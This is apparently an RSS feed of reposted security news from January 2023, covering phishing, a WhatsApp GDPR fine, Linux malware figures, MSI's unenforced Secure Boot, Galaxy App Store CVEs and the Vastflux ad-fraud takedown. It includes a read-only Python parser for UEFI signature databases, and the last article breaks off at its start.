	Some scoff at how phishing emails are still such an effective attack tool; sometimes they outright blame the victim for opening the spam email and following the instructions – but blaming the victim is wrong.
</p>

<p>
	 
</p>

<p>
	For a start, if anti-virus software and spam filters were being used and implemented correctly, in most cases, there's far less chance of malicious emails landing in people's corporate inboxes in the first place – that's a technology problem, not a people problem.
</p>

<p>
	 
</p>

<p>
	But in addition, it has become incredibly difficult to separate spam from everything else that lands in our inbox, especially when, for many of us, so many of those emails relate to office admin. Cyber crooks know it.
</p>

<p>
	 
</p>

<p>
	According to security awareness and phishing training provider KnowBe4, some of the most common subject lines used in phishing emails during the last year relate to IT software updates, messages from HR about performance, and messages claiming your boss has sent you a link to join a meeting.
</p>

<p>
	 
</p>

<p>
	Many of us are used to seeing and clicking on emails like this every single day, as they're part of how we do our jobs – if you get an email that says it's from your boss about an unexpected meeting, that's likely to send you into a panic so you'll click through.
</p>

<p>
	 
</p>

<p>
	Then with messages which claim to be about software updates and security patches, the user is just trying to do the right thing – ironically in this case, by doing what was asked and thinking they're helping to protect their computer from cyber-attacks, they're accidentally encouraging one instead.
</p>

<p>
	 
</p>

<p>
	But while it's very possible to provide staff with phishing training, it needs to be effective – one multiple choice quiz a year isn't going to cut it.
</p>

<p>
	 
</p>

<p>
	But neither will 'gotcha' style phishing tests, where fake phishing emails appear to be designed to be indistinguishable from real emails the victim will be sent every day. 
</p>

<p>
	 
</p>

<p>
	It's unlikely that phishing attacks will ever be outright stopped – at least soon – but there are steps which organizations and individuals can take to help ensure they're as protected against them as possible.
</p>

<p>
	 
</p>

<p>
	For starters, if you're uncertain about something, don't immediately click on it. If the email claims to be from a colleague, use a channel that isn't email to ask them whether they sent it. If it's an email demanding urgent action because of an issue with your account, don't click the link in the email; instead, log in to the account via the official URL. If something is wrong, it will tell you there.
</p>

<p>
	 
</p>

<p>
	In addition to this, using multi-factor authentication (MFA) can go a long way to prevent usernames and passwords of both corporate and personal accounts being stolen – although it isn't completely infallible against determined attackers.
</p>

<p>
	 
</p>

<p>
	Phishing attacks prey on human nature, they prey on our hopes and our fears, which is why they work. And until we find a replacement for email itself, they're unlikely to go away.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.zdnet.com/article/like-it-or-not-email-is-still-our-greatest-tool-and-the-source-of-some-of-our-biggest-threats/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">12075</guid><pubDate>Mon, 23 Jan 2023 02:52:07 +0000</pubDate></item><item><title>WhatsApp fined &#x20AC;5.5 million by Irish DPC for GDPR violation</title><link>https://nsaneforums.com/news/security-privacy-news/whatsapp-fined-%E2%82%AC55-million-by-irish-dpc-for-gdpr-violation-r12067/</link><description><![CDATA[<p>
	<span style="font-size:14px;">The Irish Data Protection Commission (DPC) has fined WhatsApp Ireland €5.5 million ($5.95m) after confirming that the messaging service violated the General Data Protection Regulation (GDPR).</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The authority has ordered WhatsApp to bring its data processing operations into compliance within six months, or it faces a new fine.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">On May 25, 2018, the DPC initiated an inquiry into a potential violation of the regulation by WhatsApp following a complaint from a German data subject.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">On that same day, WhatsApp updated its Terms of Service and prompted all EU-based users to accept the changes by clicking to keep accessing the app's main interface.</span>
</p>

<h3>
	<span style="font-size:14px;">Ignored user consent</span>
</h3>

<p>
	<span style="font-size:14px;">The complaint submitted to DPC contended that WhatsApp forced users to accept the changes by making it a condition to continue using the software. Hence, users had to consent to the processing of their personal data just to open the app.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This violates <a href="https://www.privacy-regulation.eu/en/r32.htm" rel="external nofollow">Article 7 recital 32</a> of the GDPR, which requires that user consent must be given freely, and on a specific, informed, and unambiguous basis, without pressure, influence, or elements that introduce imbalance in the data subject's decision.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Following a comprehensive investigation, the DPC concluded the following:</span>
</p>

<p>
	 
</p>

<ol>
	<li>
		<span style="font-size:14px;">WhatsApp Ireland did not clearly outline the legal basis or the explicit reasons for the requested user data processing, which violates Articles 12 and 13 of the GDPR.</span>
	</li>
	<li>
		<span style="font-size:14px;">WhatsApp Ireland has not violated Article 7 due to forced consent because the service did not rely on user consent for delivering its service or using it as a lawful basis for processing personal user data.</span>
	</li>
</ol>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The first point will not incur additional penalties because the DPC has already served hefty fines to WhatsApp for the same reasons.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"The DPC, having already imposed a very substantial fine of €225 million on WhatsApp Ireland for breaches of this and other transparency obligations over the same period of time, did not propose the imposition of any further fine or corrective measures, having done so already in a previous inquiry," reads the rationale of t<a href="https://www.dataprotection.ie/en/news-media/data-protection-commission-announces-conclusion-inquiry-whatsapp" rel="external nofollow">he decision</a>.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">As for the second point, DPC's rejection of the German data subject's allegations doesn't end the case, as the German Supervisory Authority will now also review the complaint.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The fine of €5.5 million on WhatsApp Ireland is imposed due to a violation of <a href="https://www.privacy-regulation.eu/en/article-6-lawfulness-of-processing-GDPR.htm" rel="external nofollow">Article 6</a> of the GDPR on "lawfulness of processing," which requires transparency, lawfulness, and fairness in data protection processes.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Additionally, the DPC will launch a new investigation covering all of WhatsApp's processing operations in its service to determine if there are violations of <a href="https://www.privacy-regulation.eu/en/article-9-processing-of-special-categories-of-personal-data-GDPR.htm" rel="external nofollow">Article 9</a> of the GDPR on "processing of special categories of personal data."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The data protection agency wants to determine whether WhatsApp collects and processes sensitive data for behavioral advertising and marketing purposes and whether this data is also shared with any third parties.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">WhatsApp informed BleepingComputer it is planning to appeal the decision, as it believes its service is operating in a legally compliant manner. Below is the full comment received from a WhatsApp spokesperson regarding DPC's decision:</span>
</p>

<blockquote>
	<p>
		<span style="font-size:14px;">WhatsApp has led the industry in private messaging by providing end-to-end encryption and layers of privacy that protect people. We strongly believe that the way the service operates is both technically and legally compliant. </span>
	</p>

	<p>
		<span style="font-size:14px;">We rely upon the contractual necessity for service improvement and security purposes because we believe helping keep people safe and offering an innovative product is a fundamental responsibility in operating our service. We disagree with the decision and we intend to appeal.</span>
	</p>
</blockquote>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/whatsapp-fined-55-million-by-irish-dpc-for-gdpr-violation/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">12067</guid><pubDate>Sun, 22 Jan 2023 17:25:36 +0000</pubDate></item><item><title>Linux malware hit a new high in 2022</title><link>https://nsaneforums.com/news/security-privacy-news/linux-malware-hit-a-new-high-in-2022-r12065/</link><description><![CDATA[<p>
	Linux might be enjoying a boost as more and more devices are powered by the operating system, but with popularity inevitably come crooks: new reports claim that the number of malware samples targeting the OS skyrocketed in 2022.
</p>

<p>
	 
</p>

<p>
	Findings from Atlas VPN, based on data from the threat intelligence platform AV-ATLAS, claim that 1.9 million new Linux malware samples appeared in 2022, up 50% year-on-year.
</p>

<p>
	 
</p>

<p>
	Most of the new Linux malware samples were discovered in the first three months of the year, the report further claims.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:24px;"><strong>Secure operating system</strong></span>
</p>

<p>
	 
</p>

<p>
	In Q1 2022, researchers discovered 854,690 new strains. In Q2, the number dropped by 3%, with 833,065 new strains detected.
</p>

<p>
	 
</p>

<p>
	Malware developers for Linux must have taken a sabbatical in the third quarter of the year, as the number of new detections plummeted 91%, to 75,841. In the fourth quarter of the year, the figures picked up once again, growing by 117% to 164,697.
</p>

<p>
	 
</p>

<p>
	Despite these findings, Linux is still a “highly secure operating system”, the researchers say.
</p>

<p>
	 
</p>

<p>
	“The open-source nature of Linux allows for constant review by the tech community, leading to fewer exploitable security vulnerabilities.
</p>

<p>
	 
</p>

<p>
	Additionally, Linux limits administrative privileges for users and compared to more widely used operating systems like Windows, it still has less malware targeting it.”
</p>

<p>
	 
</p>

<p>
	But crooks will not stop hunting for vulnerabilities in the world’s fifth most popular operating system, and businesses and consumers alike should always be on the lookout, the researchers concluded.
</p>

<p>
	 
</p>

<p>
	Linux might not be as popular as Windows, or macOS, but it’s a widely used operating system. From Android devices (which are built on Linux), to Chromebooks, video cameras, wearable devices, to all kinds of servers (web servers, database servers, email servers, etc.) there are more than 32 million endpoints running on Linux.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.msn.com/en-us/news/other/linux-malware-hit-a-new-high-in-2022/ar-AA16ChVd" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">12065</guid><pubDate>Sun, 22 Jan 2023 17:03:02 +0000</pubDate></item><item><title>300+ models of MSI motherboards have Secure Boot turned off. Is yours affected?</title><link>https://nsaneforums.com/news/security-privacy-news/300-models-of-msi-motherboards-have-secure-boot-turned-off-is-yours-affected-r12055/</link><description><![CDATA[<h2>
	<span style="font-size:14px;">The shortcoming has left users susceptible to malicious bootloaders for 18 months.</span>
</h2>

<p>
	<span style="font-size:14px;">Secure Boot is an industry standard for ensuring that Windows devices don’t load malicious firmware or software during the startup process. If you have it turned on—as you should in most cases, and it's the default setting mandated by Microsoft—good for you. If you’re using one of more than 300 motherboard models made by manufacturer MSI in the past 18 months, however, you may not be protected.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Introduced in 2011, Secure Boot establishes a chain of trust between the hardware and software or firmware that boots up a device. Prior to Secure Boot, devices used software known as the BIOS, which was installed on a small chip, to instruct them how to boot up and recognize and start hard drives, CPUs, memory, and other hardware. Once finished, this mechanism loaded the bootloader, which activates tasks and processes for loading Windows.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The problem was: The BIOS would load any bootloader that was located in the proper directory. That permissiveness allowed hackers who had brief access to a device to install rogue bootloaders that, in turn, would run malicious firmware or Windows images.</span>
</p>

<h2>
	<span style="font-size:14px;">When Secure Boot falls apart</span>
</h2>

<p>
	<span style="font-size:14px;">About a decade ago, the BIOS was replaced with the UEFI (Unified Extensible Firmware Interface), an OS in its own right that could prevent the loading of system drivers or bootloaders that weren’t digitally signed by their trusted manufacturers.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">UEFI relies on databases of both trusted and revoked signatures that OEMs load into the non-volatile memory of motherboards at the time of manufacture. The signatures list the signers and cryptographic hashes of every authorized bootloader or UEFI-controlled application, a measure that establishes the chain of trust. This chain ensures the device boots securely using only code that’s known and trusted. If unknown code is scheduled to be loaded, Secure Boot shuts down the startup process.</span>
</p>
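<p>
	The trusted and revoked signature databases just described are stored in UEFI variables in a fixed binary layout. The parser below is an added example (not from the article, from Potocki's write-up, or from sbctl) that walks the EFI_SIGNATURE_LIST / EFI_SIGNATURE_DATA structures from the UEFI specification, so you can see what a board's db and dbx actually contain; the fixture it runs on is constructed in memory with bogus hashes and a bogus certificate body, and the owner GUID in it is made up. The caveat the MSI case makes concrete: an affected board reports SecureBoot=1 and carries a populated db, yet still runs unsigned images, so this tells you what the firmware could enforce, not whether it does.
</p>

```python
"""Walk a UEFI Secure Boot signature database (db / dbx) and list what it trusts.

Added example; not from the article and not sbctl's code. Layout follows the UEFI
specification: each EFI_SIGNATURE_LIST is SignatureType (GUID), SignatureListSize,
SignatureHeaderSize, SignatureSize, an optional header, then EFI_SIGNATURE_DATA
entries of SignatureOwner (GUID) + SignatureData. efivarfs prefixes each variable
with 4 attribute bytes. The fixture below is constructed; the owner GUID is fake.
"""
from __future__ import annotations

import struct
import uuid
from pathlib import Path

EFIVARS = Path("/sys/firmware/efi/efivars")
EFI_GLOBAL_VARIABLE = "8be4df61-93ca-11d2-aa0d-00e098032b8c"          # SecureBoot, SetupMode
EFI_IMAGE_SECURITY_DATABASE = "d719b2cb-3d3a-4596-a3bc-dad00e67656f"  # db, dbx

EFI_CERT_SHA256 = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328")
EFI_CERT_X509 = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
EFI_CERT_X509_SHA256 = uuid.UUID("3bd2a492-96c0-4079-b420-fcf98ef103ed")
SIGNATURE_TYPES = {EFI_CERT_SHA256: "sha256", EFI_CERT_X509: "x509",
                   EFI_CERT_X509_SHA256: "x509-sha256"}
LIST_HEADER = struct.Struct("<16sIII")  # SignatureType, ListSize, HeaderSize, SignatureSize


def secure_boot_enabled(efivar_blob: bytes) -> bool:
    """SecureBoot variable: 4 attribute bytes then one data byte (1 = enabled)."""
    return len(efivar_blob) >= 5 and efivar_blob[4] == 1


def parse_signature_db(blob: bytes, efivarfs: bool = True) -> list[dict]:
    """Return one record per signature entry: type name, owner GUID and raw data."""
    if efivarfs:
        blob = blob[4:]
    entries, pos = [], 0
    while pos + LIST_HEADER.size <= len(blob):
        sig_type, list_size, hdr_size, sig_size = LIST_HEADER.unpack_from(blob, pos)
        if list_size < LIST_HEADER.size or pos + list_size > len(blob) or sig_size <= 16:
            raise ValueError(f"malformed EFI_SIGNATURE_LIST at offset {pos}")
        kind = SIGNATURE_TYPES.get(uuid.UUID(bytes_le=sig_type), "unknown")
        cursor, list_end = pos + LIST_HEADER.size + hdr_size, pos + list_size
        while cursor + sig_size <= list_end:
            owner = uuid.UUID(bytes_le=blob[cursor:cursor + 16])
            entries.append({"type": kind, "owner": str(owner),
                            "data": blob[cursor + 16:cursor + sig_size]})
            cursor += sig_size
        pos = list_end
    return entries


def summarize(entries: list[dict]) -> dict[str, int]:
    """Count entries by signature type."""
    counts: dict[str, int] = {}
    for entry in entries:
        counts[entry["type"]] = counts.get(entry["type"], 0) + 1
    return counts


def build_signature_list(sig_type: uuid.UUID, owner: uuid.UUID, payloads: list[bytes]) -> bytes:
    """Serialize one EFI_SIGNATURE_LIST (all payloads in a list share one SignatureSize)."""
    sizes = {len(p) for p in payloads}
    if len(sizes) != 1:
        raise ValueError("entries in one list must have equal SignatureSize")
    sig_size = 16 + sizes.pop()
    body = b"".join(owner.bytes_le + p for p in payloads)
    return LIST_HEADER.pack(sig_type.bytes_le, LIST_HEADER.size + len(body), 0, sig_size) + body


# Constructed fixture: two bogus SHA-256 hashes and one bogus DER-looking certificate.
FAKE_OWNER = uuid.UUID("00000000-0000-0000-0000-00000000beef")  # made-up owner GUID
SAMPLE_DB = (b"\x27\x00\x00\x00"  # efivarfs attributes: NV | BS | RT | TIME_BASED_AUTH
             + build_signature_list(EFI_CERT_SHA256, FAKE_OWNER, [b"\x11" * 32, b"\x22" * 32])
             + build_signature_list(EFI_CERT_X509, FAKE_OWNER, [b"\x30\x82" + b"\x00" * 70]))

if __name__ == "__main__":
    sb = EFIVARS / f"SecureBoot-{EFI_GLOBAL_VARIABLE}"
    if sb.exists():
        print("SecureBoot variable says enabled:", secure_boot_enabled(sb.read_bytes()))
    for name in ("db", "dbx"):
        path = EFIVARS / f"{name}-{EFI_IMAGE_SECURITY_DATABASE}"
        if path.exists():
            print(name, summarize(parse_signature_db(path.read_bytes())))
    print("sample:", summarize(parse_signature_db(SAMPLE_DB)))
```

<p>
	On a Linux box the <code>__main__</code> section reads the live variables from efivarfs; on Windows, <code>Confirm-SecureBootUEFI</code> reads the same SecureBoot flag. Neither view exposes MSI's Image Execution Policy, which is why the only decisive test on these boards is the one Potocki stumbled on: offer the firmware an unsigned EFI image and see whether it refuses.
</p>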

<p>
	 
</p>

<p>
	<span style="font-size:14px;">A researcher and student recently discovered that more than 300 motherboard models from Taiwan-based MSI, by default, aren’t implementing Secure Boot and are allowing any bootloader to run. The models work with various hardware and firmware, including many from Intel and AMD (the full list is <a href="https://github.com/Foxboron/sbctl/issues/181" rel="external nofollow">here</a>). The shortcoming was introduced sometime in the third quarter of 2021. The researcher accidentally uncovered the problem when attempting to digitally sign various components of his system.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">“On 2022-12-11, I decided to setup Secure Boot on my new desktop with a help of <a href="https://arstechnica.com/information-technology/2023/01/300-models-of-msi-motherboards-have-secure-boot-turned-off-is-yours-affected/%E2%80%8B%E2%80%8Bhttps://github.com/Foxboron/sbctl" rel="external nofollow">sbctl</a>,” Dawid Potocki, a Poland-born researcher who now lives in New Zealand, <a href="https://dawidpotocki.com/en/2023/01/13/msi-insecure-boot/" rel="external nofollow">wrote</a>. “Unfortunately I have found that my firmware was… accepting every OS image I gave it, no matter if it was trusted or not. It wasn't the first time that I have been self-signing Secure Boot, I wasn't doing it wrong.”</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Potocki said he found no indication motherboards from manufacturers ASRock, Asus, Biostar, EVGA, Gigabyte, and NZXT suffer the same shortcoming.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The researcher went on to report that the broken Secure Boot was the result of MSI inexplicably changing its default settings. Users who want to implement Secure Boot— which really should be everyone—must access the settings on their affected motherboard. To do that, hold down the Del button on the keyboard while the device is booting up. From there, select the menu that says Security\Secure Boot or something to that effect and then select the Image Execution Policy submenu. If your motherboard is affected, Removable Media and Fixed Media will be set to "Always Execute."</span>
</p>

<p>
	 
</p>

<p>
	<img alt="image-execution-policy-640x480.jpg" class="ipsImage" data-ratio="75.00" height="480" width="640" src="https://cdn.arstechnica.net/wp-content/uploads/2023/01/image-execution-policy-640x480.jpg">
</p>


<div>
	<span style="font-size:14px;">Getty Images</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">To fix, change “Always Execute” for these two categories to “Deny Execute.”</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">In a <a href="https://www.reddit.com/r/MSI_Gaming/comments/10g9v3m/msi_statement_on_secure_boot/" rel="external nofollow">Reddit post</a> published on Thursday, an MSI representative confirmed Potocki’s findings. The representative wrote:</span>
</p>

<blockquote>
	<p>
		<span style="font-size:14px;">We preemptively set Secure Boot as Enabled and "Always Execute" as the default setting to offer a user-friendly environment that allows multiple end-users flexibility to build their PC systems with thousands (or more) of components that included their built-in option ROM, including OS images, resulting in higher compatibility configurations. For users who are highly concerned about security, they can still set “Image Execution Policy” as "Deny Execute" or other options manually to meet their security needs.</span>
	</p>
</blockquote>

<p>
	<span style="font-size:14px;">The post said that MSI will release new firmware versions that will change the default settings to “Deny Execute.” The above-linked subreddit contains a discussion that may help users troubleshoot any problems.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">As mentioned, Secure Boot is designed to prevent attacks in which an untrusted person surreptitiously gets brief access to a device and tampers with its firmware and software. Such hacks are usually known as “Evil Maid attacks,” but a better description is “Stalker Ex-Boyfriend attacks.”</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://arstechnica.com/information-technology/2023/01/300-models-of-msi-motherboards-have-secure-boot-turned-off-is-yours-affected/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">12055</guid><pubDate>Sat, 21 Jan 2023 17:30:11 +0000</pubDate></item><item><title>Exploits released for two Samsung Galaxy App Store vulnerabilities</title><link>https://nsaneforums.com/news/security-privacy-news/exploits-released-for-two-samsung-galaxy-app-store-vulnerabilities-r12052/</link><description><![CDATA[<p>
	<span style="font-size:14px;">Two vulnerabilities in the Galaxy App Store, Samsung’s official repository for its devices, could enable attackers to install any app in the Galaxy Store without the user’s knowledge or to direct victims to a malicious web location.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The issues were discovered by researchers from the NCC Group between November 23 and December 3, 2022.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The Korean smartphone maker announced on January 1, 2023 that it fixed the two flaws and released a new version for Galaxy App Store (4.5.49.8).</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Today, the <a href="https://research.nccgroup.com/2023/01/20/technical-advisory-multiple-vulnerabilities-in-the-galaxy-app-store-cve-2023-21433-cve-2023-21434/" rel="external nofollow">NCC Group published</a> technical details for the two security issues, along with proof-of-concept (PoC) exploit code for each of them.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">It should be noted that both attacks require local access, an easy feat for motivated hackers and malware distributors targeting mobile devices.</span>
</p>

<h2>
	<span style="font-size:14px;">Forcing app installs on Android</span>
</h2>

<p>
	<span style="font-size:14px;">The first of the two flaws is tracked as CVE-2023-21433 and is an improper access control that allows attackers to install any applications available on the Galaxy App Store.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">NCC discovered that the Galaxy App Store does not handle incoming intents in a safe way, allowing apps on the device to send arbitrary app installation requests.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The PoC shared by NCC’s analysts is an ‘ADB’ (Android Debug Bridge) command that instructs an app component to install the “Pokemon Go” game by sending an intent with the specified target application to the app store.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="command.png" class="ipsImage" data-ratio="14.31" height="99" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/5/command.png" />
		
			<p>
				<span style="font-size:14px;">ADB command used in the PoC (NCC Group)</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">The intent may also specify if the new application should be opened or not after its installation, which gives threat actors more choices over how to conduct the attack.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The second vulnerability is CVE-2023-21434 is an improper input validation that lets attackers execute JavaScript on the target device.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">NCC’s researchers found that webviews in the Galaxy App Store contain a filter that limits the domains it can be shown in it. However, that filter isn’t properly configured and can be bypassed to force the webview to access malicious domains.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The PoC presented in the report is a hyperlink that, if clicked from Chrome, will open a page containing malicious JavaScript and run it on the device.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="hyperlink.png" class="ipsImage" data-ratio="36.39" height="252" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/5/hyperlink.png" />
		
			<p>
				<span style="font-size:14px;">Hyperlink that forces the Galaxy Store's webview to browse to an unsafe site (NCC Group)</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">NCC explains that the only prerequisite for this attack is for the malicious domain to have the “player.glb.samsung-gamelauncher.com” part in it. An attacker can register any domain and add that part as a subdomain.</span>
</p>

<h2>
	<span style="font-size:14px;">Impact on Samsung users</span>
</h2>

<p>
	<span style="font-size:14px;">Running arbitrary JavaScript code in webviews from within system-privilege apps like the Galaxy Store can come with severe security repercussions.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Depending on the attacker’s motives, the attack may lead to app UI interaction, access to sensitive information, or crashing apps.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The installation and automatic launch of apps from the Galaxy Store without the user’s knowledge may also lead to data or privacy breaches, especially if the attacker uploads a malicious app on the Galaxy Store beforehand.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">It is important to note that CVE-2023-21433 is not exploitable on Samsung devices running Android 13, even if they use an older and vulnerable version of the Galaxy Store. This is due to additional security protections in the latest version of Google’s mobile OS.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Unfortunately, all Samsung devices that are no longer supported by the vendor and which remain stuck on an older Galaxy Store version are vulnerable to the two flaws discovered by the NCC Group researchers.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/exploits-released-for-two-samsung-galaxy-app-store-vulnerabilities/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">12052</guid><pubDate>Sat, 21 Jan 2023 17:16:19 +0000</pubDate></item><item><title>Massive ad-fraud op dismantled after hitting millions of iOS devices</title><link>https://nsaneforums.com/news/security-privacy-news/massive-ad-fraud-op-dismantled-after-hitting-millions-of-ios-devices-r12051/</link><description><![CDATA[<p>
	<span style="font-size:14px;">A massive ad fraud operation dubbed 'Vastflux' that spoofed more than 1,700 applications from 120 publishers, mostly for iOS, has been disrupted by security researchers at cybersecurity company HUMAN.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The operation's name was derived from the VAST ad-serving template and the "fast flux" evasion technique used to conceal malicious code by rapidly changing a large number of IP addresses and DNS records associated with a single domain.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">According to HUMAN's report, Vastflux generated over 12 billion bid requests per day at its peak and impacted almost 11 million devices, many in Apple's iOS ecosystem.</span>
</p>

<h2>
	<span style="font-size:14px;">Vastflux details</span>
</h2>

<p>
	<span style="font-size:14px;">The research team at HUMAN (Satori) discovered Vastflux while investigating a separate ad fraud scheme. They noticed that an app was generating an unusually large number of requests using different app IDs.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">By reverse engineering the obfuscated JavaScript that operated in the app, the Satori team discovered the command and control (C2) server IP address it was communicating with and the ad-generating commands it sent.</span>
</p>

<p>
	 
</p>

<div>
	<span style="font-size:14px;">"What the team pieced together was an expansive malvertising operation in which the bad actors injected JavaScript into ad creatives they issued, and then stacked a whole bunch of video players on top of one another, getting paid for all of the ads when none of them were visible to the person using the device." - <a href="https://www.humansecurity.com/learn/blog/traffic-signals-the-vastflux-takedown?hsLang=en-us" rel="external nofollow">HUMAN</a></span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">Vastflux generated bids for displaying in-app ad banners. If it won, it placed a static banner image and injected obfuscated JavaScript into it.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The injected scripts contacted the C2 server to receive an encrypted configuration payload, which included instructions on the position, size, and type of ads to be displayed, as well as data for spoofing real app and publisher IDs.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Vastflux stacked up to 25 video ads on top of one another, all generating ad view revenue, but none of them was visible to the user as they were rendered behind the active window.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="inv-render.png" class="ipsImage" data-ratio="75.10" height="443" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Adware/1/inv-render.png" />
		
			<p>
				<span style="font-size:14px;">Rendering multiple invisible video ads (HUMAN)</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">To evade detection, Vastflux omitted the use of ad verification tags, which allow marketers to generate performance metrics. By avoiding these, the scheme was made invisible to most third-party ad-performance trackers.</span>
</p>

<h2>
	<span style="font-size:14px;">Vastflux takedown</span>
</h2>

<p>
	<span style="font-size:14px;">Having mapped the infrastructure for the Vastflux operation, HUMAN launched three waves of targeted action between June and July 2022, involving customers, partners, and the spoofed brands, each delivering a blow to the fraudulent activity.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Eventually, Vastflux took its C2 servers offline for a while and scaled down its operations, and on December 6, 2022, the ad bids went down to zero for the first time.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="Takedown-Graph.jpg" class="ipsImage" data-ratio="75.10" height="362" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Adware/1/Takedown-Graph.jpg" />
		
			<p>
				<span style="font-size:14px;">Timeline of Vastflux's takedown (HUMAN)</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">While ad fraud does not have a malicious impact on app users, it causes performance drops for the device, increases the use of battery and internet data, and can even lead to device overheating.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The above are common signs of adware infections or ad fraud on the device, and users should treat them with suspicion and try to pinpoint the app(s) that account for most of the resource consumption.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Video ads consume much more power than static ads, and multiple hidden video players aren't easy to hide from performance monitors, so it's crucial to always keep an eye on running processes and look for signs of trouble.</span>
</p>

<div>
	 
</div>

<div>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/massive-ad-fraud-op-dismantled-after-hitting-millions-of-ios-devices/" rel="external nofollow">Source</a></span>
</div>
]]></description><guid isPermaLink="false">12051</guid><pubDate>Sat, 21 Jan 2023 17:14:23 +0000</pubDate></item><item><title>Beware: Hackers now use OneNote attachments to spread malware</title><link>https://nsaneforums.com/news/security-privacy-news/beware-hackers-now-use-onenote-attachments-to-spread-malware-r12050/</link><description><![CDATA[<p>
	<span style="font-size:14px;">Threat actors now use OneNote attachments in phishing emails that infect victims with remote access malware, which can be used to install further malware, steal passwords, or even steal cryptocurrency wallets.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This comes after attackers have been distributing malware in emails using malicious Word and Excel attachments that launch macros to download and install malware for years.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">However, in July, <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-starts-blocking-office-macros-by-default-once-again/" rel="external nofollow">Microsoft finally disabled macros by default</a> in Office documents, making this method unreliable for distributing malware.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Soon after, threat actors began utilizing new file formats, such as ISO images and password-protected ZIP files. These file formats soon became extremely common, aided by a Windows bug allowing ISOs to bypass security warnings and the popular 7-Zip archive utility not propagating mark-of-the-web flags to files extracted from ZIP archives.</span>
</p>

<p>
	 
</p>

<p>
